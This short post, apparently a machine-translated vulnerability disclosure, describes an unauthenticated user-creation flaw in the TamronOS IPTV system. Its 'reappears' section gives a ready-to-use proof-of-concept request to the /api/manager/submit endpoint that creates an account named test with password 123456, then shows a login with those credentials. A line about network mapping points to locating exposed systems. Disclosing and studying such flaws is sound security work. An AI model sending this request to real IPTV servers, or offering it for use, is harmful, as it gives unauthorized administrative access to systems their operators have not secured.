Post

Tamronos Iptv System Submit Vulnerability Created By Any User

Tamronos Iptv System Submit Vulnerability Created By Any User

TamronOS IPTV system submit vulnerability created by any user

Vulnerability Description

TamronOS IPTV system /api/manager/submit There is a vulnerability to create any user. The attacker can create any user into the background through the vulnerability.

Vulnerability Impact

TamronOS IPTV system

Network surveying and mapping

Vulnerability reappears

The login page is as follows

img

The vulnerability POC is

/api/manager/submit?group=1&username=test&password=123456

img

user: test
pass: 123456

img

This post is licensed under CC BY 4.0 by the author.